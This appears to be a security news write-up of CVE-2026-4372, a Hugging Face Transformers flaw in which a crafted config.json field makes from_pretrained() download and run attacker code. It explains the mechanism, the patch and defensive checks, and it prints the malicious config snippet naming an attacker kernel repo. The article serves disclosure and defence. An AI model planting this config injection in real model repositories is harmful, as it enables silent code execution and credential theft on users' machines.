Skip to content
AI Security Wire

Published

- 6 min read

By

CVE-2026-4372: Hugging Face Transformers RCE via Config Injection

img of CVE-2026-4372: Hugging Face Transformers RCE via Config Injection

A critical vulnerability in Hugging Face Transformers, tracked as CVE-2026-4372, allowed arbitrary code execution on any machine that loaded a poisoned model using the standard from_pretrained() call, with no user interaction beyond the load itself and no warnings of any kind. The flaw, discovered by Pluto Security researcher Yotam Perkal and patched in Transformers v5.3.0 on March 3, 2026, exploited a config deserialization path that completely bypassed trust_remote_code=False, the library’s documented safety boundary. Public CVE disclosure came 81 days after the patch, meaning users had no official signal while vulnerable versions accumulated another 232 million downloads.

How the Attack Works

The exploit chains three separate design weaknesses in the library.

First, configuration_utils.py processes remote model configs by applying every JSON field to the config object via a generic setattr loop. There is no allowlist, no filtering of internal attributes, and no validation of field names against an expected schema. Any key in config.json lands directly on the config object.

Second, a specific private attribute, _attn_implementation_internal, controls which attention kernel the library loads. Because it starts with an underscore, it was treated as internal and excluded from the sanitization logic that checks the public attn_implementation field. The underscore prefix offered no protection; it only bypassed the guard.

Third, when _attn_implementation_internal holds a value matching the owner/repo pattern, the library’s hub_kernels.py component interprets it as a Hugging Face Hub kernel repository reference. It downloads the repository and imports it via importlib.import_module(). No sandboxing. No code signing. No integrity check. No user prompt.

The full attack requires two attacker-controlled repositories. The first is a kernel repo containing a malicious __init__.py. The second is a model repo with an otherwise-normal config.json containing:

   {
  "_attn_implementation_internal": "attacker/malicious-kernel"
}

When a victim calls from_pretrained("attacker/poisoned-model"), the library deserializes the config, sets the underscore attribute, identifies the kernel repo reference, downloads it, and executes it, all before from_pretrained() returns. The victim sees nothing unusual. Pluto Security’s proof-of-concept demonstrated silent exfiltration of AWS credentials, SSH keys, and environment files in the time the standard model load takes.

Scope and Timeline

The vulnerable code path was introduced in Transformers 4.56.0, released August 29, 2025. It remained exploitable through 5.2.x. Yotam Perkal reported the issue via the huntr bug bounty platform on February 23, 2026. Hugging Face merged the fix and released v5.3.0 ten days later, on March 3, 2026. The CVE was published publicly on May 24, 2026, creating an 81-day window where the patch existed but no official advisory prompted users to apply it.

The package’s download scale makes the exposure count significant. Transformers has approximately 2.2 billion total PyPI installs and roughly 146 million monthly downloads. Pluto Security estimated that vulnerable versions represented about 35% of all Transformers installs at the time of disclosure. By the time CVE-2026-4372 was published, vulnerable versions had accumulated 232 million downloads since the patch landed. As of early June 2026, 7 to 8 million downloads per week were still landing on vulnerable versions.

The kernels optional package is a prerequisite for exploitation, and it had roughly 1.7 million downloads. This limits the total exploitable population compared to raw Transformers download numbers, but the population it does cover includes exactly the teams running GPU-optimised inference in production: enterprise ML infrastructure, cloud inference deployments, and research clusters.

What the Patch Changes

PR #44395 applied two fixes.

The setattr loop now maintains an explicit denylist that blocks _attn_implementation_internal and _experts_implementation_internal from being set via config deserialization. Neither field can be injected through a remote config.json.

Kernel loading now requires trust_remote_code=True for any kernel repository outside the official kernels-community Hugging Face organization. This extends the existing trust boundary to cover the kernel-loading code path that the original implementation left ungated.

Together, these changes close the injection vector and align kernel loading with the consent model users already understand.

Threat Model for Model Registries

CVE-2026-4372 sits at an uncomfortable intersection: it requires a malicious model to be published on Hugging Face Hub and a victim to load it. Hugging Face’s malware scanning runs against model weights and does not have visibility into the behavioral consequences of config fields. A config.json containing _attn_implementation_internal set to an attacker repo would not trigger existing scanners because the field name looks like an internal attribute and the referenced repo might itself contain legitimate-looking Python.

The attack is plausible in several scenarios. A compromised legitimate model account could add the field to an existing trusted model. A typosquatted model name could distribute it to users making common naming mistakes. A supply chain compromise of an organization’s private Hugging Face model registry would expose every team that loaded from that registry.

This is a different threat profile than the standard supply chain attack on PyPI. Model loading is increasingly treated as a data operation rather than a code execution event, and that mental model is wrong.

Defensive Guidance

Upgrade to Transformers 5.3.0 or later. This is the only complete fix. Version 5.3.0 has been available since March 3, 2026.

Scan cached config.json files. Any previously downloaded model that contains the _attn_implementation_internal field should be treated as suspect. The field has no legitimate use in user-facing configs. Grep or scan your Hugging Face cache directory (typically ~/.cache/huggingface/hub/) for this key.

Run model loading in isolated containers. Until provenance guarantees exist across the Hub, treat from_pretrained() as equivalent to running untrusted code. That means no host credentials in the environment, no SSH keys mounted, no outbound network access beyond what the load itself requires, and no write access to production storage. A container that can only write to a scratch directory and exit dramatically limits what a malicious kernel can exfiltrate.

Verify the kernels package version. If your environment requires the kernels package, confirm it is paired with a patched Transformers version. Unpatched Transformers plus any version of kernels is the exploitable combination.

Add _attn_implementation_internal to your model security review checklist. Any model undergoing internal security review before deployment should have its config.json checked for this field. Cisco’s Model Provenance Kit includes this check in its post-patch release.

The 81-day gap between patch and CVE advisory is a systemic problem. Hugging Face has the fix. The exposure came from silent propagation of vulnerable versions with no official prompt to update. Security teams relying on CVE feeds alone would have been unaware until late May that a remote code execution path existed in one of the most widely deployed ML libraries in the world.

Frequently Asked Questions

Does exploiting CVE-2026-4372 require trust_remote_code=True?
No, and that is precisely what makes this vulnerability dangerous. The trust_remote_code flag gates one explicit code-loading path, but CVE-2026-4372 exploits a separate kernel-loading mechanism triggered through config deserialization. Victims using the default trust_remote_code=False are fully exposed. The patch adds a consent requirement specifically to this kernel-loading path.
What does a poisoned Hugging Face model config look like?
The malicious config.json contains one additional field: _attn_implementation_internal set to a value matching the attacker/kernel-repo pattern. Everything else looks normal. The model may function correctly after loading, which makes detection without scanning for that specific field very difficult. Pluto Security demonstrated that no errors, warnings, or prompts are generated during exploitation.
Is the kernels package required for exploitation?
Yes. The exploit requires the optional kernels package, a companion library for GPU-optimised attention implementations. That package had approximately 1.7 million downloads, and the population most likely to have it installed includes enterprise ML teams running inference-optimised workloads. Users running standard CPU inference without the kernels package are not reachable via this attack path.